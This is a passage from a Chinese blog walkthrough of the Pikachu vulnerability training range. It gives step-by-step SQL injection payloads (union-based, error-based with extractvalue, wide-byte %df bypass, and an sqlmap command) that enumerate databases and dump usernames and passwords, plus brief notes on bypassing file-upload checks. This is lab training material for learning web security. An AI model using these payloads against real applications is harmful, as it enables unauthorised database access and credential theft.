</li>
<li><p>尝试注入,2列</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1 order by 2&amp;submit=%E6%9F%A5%E8%AF%A2</span><br></pre></td></tr></table></figure>
</li>
<li><p>爆出回显位</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1 union select 1,2&amp;submit=%E6%9F%A5%E8%AF%A2</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151335056.png?token=ARYCSAUNWHHQI3WY2EMVR6TCQCIUC"></p>
</li>
<li><p>爆库名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1 union select database(),user()&amp;submit=%E6%9F%A5%E8%AF%A2</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151335214.png?token=ARYCSAXY7XPWYZ52NLBN633CQCIWC"></p>
</li>
<li><p>爆表名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1  union select 1,group_concat(table_name) from information_schema.tables <span class="built_in">where</span> table_schema=database() <span class="comment">#</span></span><br><span class="line">&amp;submit=%E6%9F%A5%E8%AF%A2</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151336796.png?token=ARYCSASKTPN6D7C276OH2MTCQCIZY"></p>
</li>
<li><p>爆字段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1 union select 1,group_concat(column_name) from information_schema.columns <span class="built_in">where</span> table_name=<span class="string">&#x27;users&#x27;</span></span><br><span class="line">&amp;submit=%E6%9F%A5%E8%AF%A2</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151336584.png?token=ARYCSARJ2QB3VIHRUF7BBGLCQCI3C"></p>
</li>
<li><p>爆数据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1 union select 1,(select concat(0x7e,group_concat(username,password),0x7e) from <span class="built_in">users</span> )<span class="comment">#</span></span><br><span class="line">&amp;submit=%E6%9F%A5%E8%AF%A2</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151337610.png?token=ARYCSAXFRTG7KB3R6NRVTQDCQCI4S"></p>
</li>
</ol>
<h2 id="字符型-get"><a href="#字符型-get" class="headerlink" title="字符型(get)"></a>字符型(get)</h2><ol>
<li><p>判断注入,字符型一般都需要闭合</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_str.php?name=admin<span class="string">&#x27;1</span></span><br></pre></td></tr></table></figure>
<p>报错,说明是由 <code>&#39;</code> 引起的注入</p>
</li>
<li><p>万能密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_str.php?name=aa<span class="string">&#x27;  or 1=1  --+</span></span><br></pre></td></tr></table></figure>
<p>会爆出所有账号密码</p>
</li>
<li><p>判断列</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_str.php?name=aa<span class="string">&#x27;  order by 2  --+</span></span><br></pre></td></tr></table></figure>
<p>回显正常说明2列</p>
</li>
<li><p>爆所有库名</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">10.20</span>.<span class="number">146.195</span>:<span class="number">8080</span><span class="regexp">/vul/</span>sqli/sqli_str.php?name=admin<span class="string">&#x27;  union select 1,group_concat(schema_name) from information_schema.schemata--+</span></span><br></pre></td></tr></table></figure></li>
</ol>
<p>5.爆表名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_str.php?name=admin<span class="string">&#x27;  union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+</span></span><br></pre></td></tr></table></figure>

<p>6.爆列名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_str.php?name=admin<span class="string">&#x27;  union select 1,group_concat(column_name) from information_schema.columns where table_name=&#x27;</span><span class="built_in">users</span><span class="string">&#x27; --+</span></span><br></pre></td></tr></table></figure>

<p>7.爆数据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_str.php?name=admin<span class="string">&#x27;  union select (select group_concat(username) from users),((select group_concat(password) from users))--+</span></span><br></pre></td></tr></table></figure>

<h2 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a>搜索型注入</h2><ol>
<li><p>判断注入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_search.php?name=1<span class="string">&#x27; </span></span><br></pre></td></tr></table></figure>
<p>基于 <code>&#39;</code> 注入</p>
</li>
<li><p>万能密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_search.php?name=1<span class="string">&#x27; or 1=1 --+</span></span><br></pre></td></tr></table></figure>
<p>会爆出所有密码</p>
</li>
<li><p>猜解列名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_search.php?name=1<span class="string">&#x27; order by 3 --+ </span></span><br></pre></td></tr></table></figure>
<p>3回显正常,4报错,说明有3列</p>
</li>
<li><p>爆数据<br>如上</p>
</li>
</ol>
<h2 id="xx型注入"><a href="#xx型注入" class="headerlink" title="xx型注入"></a>xx型注入</h2><ol>
<li><p>判断注入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_x.php?name=1<span class="string">&#x27; --+</span></span><br></pre></td></tr></table></figure>
<p>报错</p>
</li>
<li><p>闭合语句</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.146.195:8080/vul/sqli/sqli_x.php?name=1<span class="string">&#x27;)  and 1 = 1 --+</span></span><br></pre></td></tr></table></figure>
<p>基于 <code>&#39;)</code> 引起的注入</p>
</li>
<li><p>爆库<br>步骤如上</p>
</li>
</ol>
<h2 id="insert-amp-update注入"><a href="#insert-amp-update注入" class="headerlink" title="insert&amp;update注入"></a>insert&amp;update注入</h2><h3 id="insert"><a href="#insert" class="headerlink" title="insert"></a>insert</h3><p>注册为insert注入,首先注册</p>
<ol>
<li><p>判断注入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add=&amp;email=&amp;password=123&amp;phonenum=&amp;sex=&amp;submit=submit&amp;username=aa<span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>
<p>由 <code>&#39;</code> 引起报错</p>
</li>
<li><p>爆库</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add=&amp;email=&amp;password=qwe&amp;phonenum=&amp;sex=&amp;submit=submit&amp;username=123<span class="string">&#x27;  and extractvalue(0x0a,concat(0x0a,(select database())))  and &#x27;</span><span class="comment"># </span></span><br></pre></td></tr></table></figure>
<p>使用报错注入,必须要报错,所以使用 <code>and</code> 让语句报错</p>
</li>
<li><p>爆表名 </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=123<span class="string">&#x27;  and extractvalue(0x0a,concat(0x0a,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,32)))  and  &#x27;</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>
<p>但是报错注入<code>只会报出32个字符</code>,所以要使用偏移量substr</p>
</li>
<li><p>爆列名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username=123<span class="string">&#x27; and </span></span><br><span class="line"><span class="string">extractvalue (1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name=&#x27;</span><span class="built_in">users</span><span class="string">&#x27; and table_schema=database()),1,32),0x7e)) and  &#x27;</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>爆数据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&amp;username=123<span class="string">&#x27;  and extractvalue(0x0a,concat(0x0a,substr((select group_concat(username) from users),1,32)))  and  &#x27;</span> <span class="comment">#</span></span><br><span class="line"></span><br><span class="line">&amp;username=123<span class="string">&#x27;  and extractvalue(0x0a,concat(0x0a,substr((select group_concat(password) from users),1,32)))  and  &#x27;</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="update"><a href="#update" class="headerlink" title="update"></a>update</h3><p>修改个人信息为update注入,先注册后登录</p>
<ol>
<li><p>判断注入点</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add=123<span class="string">&#x27;&amp;email=111&amp;phonenum=111&amp;sex=%E7%94%B7&amp;submit=submit</span></span><br></pre></td></tr></table></figure>
<p>由 <code>&#39;</code> 引起报错</p>
</li>
<li><p>爆库名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add=123<span class="string">&#x27; and extractvalue(0x0a,concat(0x0a,(select database()))) #&amp;email=111&amp;phonenum=111&amp;sex=%E7%94%B7&amp;submit=submit </span></span><br></pre></td></tr></table></figure>
</li>
<li><p>爆表名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add=123<span class="string">&#x27; and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) </span></span><br></pre></td></tr></table></figure>
</li>
<li><p>后续操作如上</p>
</li>
</ol>
<h2 id="delete注入"><a href="#delete注入" class="headerlink" title="delete注入"></a>delete注入</h2><ol>
<li><p>判断注入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=56<span class="string">&#x27;  --+</span></span><br></pre></td></tr></table></figure>
<p>由 <code>&#39;</code> 引起报错</p>
</li>
<li><p>爆库名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=56 and  extractvalue(0x0a,concat(0x0a,(select database()))) --+</span><br></pre></td></tr></table></figure>
<p>使用报错注入</p>
</li>
</ol>
<h2 id="http头注入"><a href="#http头注入" class="headerlink" title="http头注入"></a>http头注入</h2><ol>
<li>抓包判断注入<br>由 <code>&#39;</code> 引起的注入</li>
</ol>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151339050.png?token=ARYCSAQFEL42LGPO2MJ7EX3CQCJDS"></p>
<ol start="2">
<li>注入<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27; and extractvalue(0x0a,concat(0x0a,(select database()))) and &#x27;</span> <span class="comment">#</span></span><br></pre></td></tr></table></figure>
此处需要使用 <code>and &#39;</code> 闭合语句</li>
</ol>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151338332.png?token=ARYCSAT4PLVT4OXNI4EO4VTCQCJBA"></p>
<h2 id="基于boolian的盲注"><a href="#基于boolian的盲注" class="headerlink" title="基于boolian的盲注"></a>基于boolian的盲注</h2><p>没有回显,也没有报错信息,sqlmap直接梭哈</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&#x27;http://localhost/vul/sqli/sqli_blind_b.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2#&#x27;</span> --batch --threads 10 --dbs </span><br></pre></td></tr></table></figure>

<h2 id="基于时间的盲注"><a href="#基于时间的盲注" class="headerlink" title="基于时间的盲注"></a>基于时间的盲注</h2><p>sqlmap梭哈</p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><p>在PHP配置文件中magic_quotes_gpc&#x3D;On或者使用addslashes函数，icov函数,mysql_real_escape_string函数、mysql_escape_string函数等，提交的参数中如果带有单引号’，就会被自动转义&#39;，这样就使得多数注入攻击无效。<br>当输入单引号，假设这里我们使用addslashes转义，对应的url编码是：<br><code>&#39; –&gt;\&#39;–&gt; %5c%27</code><br>当在前面引入一个ASCII大于128的字符【比如%df、%aa】，url编码变为：<br><code>%df&#39; –&gt; %df\&#39; –&gt; (%df%5C)%27–&gt;(数据库GBK)–&gt;運&#39;</code><br>前端输入**%df’时首先经过上面addslashes函数和浏览器url编码转义变成了%df%5c%27**<br>因为数据库使用GBK编码的话，**%df%5c会被当作一个汉字处理,转换成了汉字”運”**，从而使%27（单引号）逃出生天，成功绕过,利用这个特性从而可实施SQL注入的利用。 <a target="_blank" rel="noopener" href="https://jwt1399.top/posts/32179.html#toc-heading-75">原文</a></p>
<ol>
<li>爆列数<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=1%<span class="built_in">df</span><span class="string">&#x27;  union select 1,2# &amp;submit=%E6%9F%A5%E8%AF%A2</span></span><br></pre></td></tr></table></figure></li>
<li>爆库名<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=1%<span class="built_in">df</span><span class="string">&#x27;  union select 1,database()# &amp;submit=%E6%9F%A5%E8%AF%A2</span></span><br></pre></td></tr></table></figure></li>
</ol>
<h1 id="unsafe-upfileupload"><a href="#unsafe-upfileupload" class="headerlink" title="unsafe upfileupload"></a>unsafe upfileupload</h1><p>文件上传</p>
<h2 id="客户端check"><a href="#客户端check" class="headerlink" title="客户端check"></a>客户端check</h2><p>前端校验,抓包修改<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151515028.png"></p>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151516450.png"></p>
<h2 id="服务端check"><a href="#服务端check" class="headerlink" title="服务端check"></a>服务端check</h2><p>检查MIME,一样抓包修改<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151529002.png"></p>
<h2 id="getimagesize"><a href="#getimagesize" class="headerlink" title="getimagesize()"></a>getimagesize()</h2><p>上传图片马,配合文件包含漏洞或者解析漏洞<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151534906.png"></p>

    </div>

    
    
    
      


    <footer class="post-footer">
          <div class="reward-container">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.JPG" alt="chenci 微信">
        <span>微信</span>
      </div>
      <div>
        <img src="/images/alipay.JPG" alt="chenci 支付宝">
        <span>支付宝</span>
      </div>

  </div>
</div>

          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>chenci
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://example.com/2022/04/28/pikachu%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/" title="pikachu漏洞靶场通关">http://example.com/2022/04/28/pikachu漏洞靶场通关/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/04/28/sqlmap%E4%BD%BF%E7%94%A8/" rel="prev" title="sqlmap使用">
                  <i class="fa fa-chevron-left"></i> sqlmap使用
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/05/01/%E4%B8%AD%E9%97%B4%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" rel="next" title="中间件解析漏洞总结">
                  中间件解析漏洞总结 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2021 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">chenci</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>


    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" integrity="sha256-yt2kYMy0w8AbtF89WXb2P1rfjcP/HTHLT7097U8Y5b8=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>



  <script src="/js/third-party/fancybox.js"></script>


  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
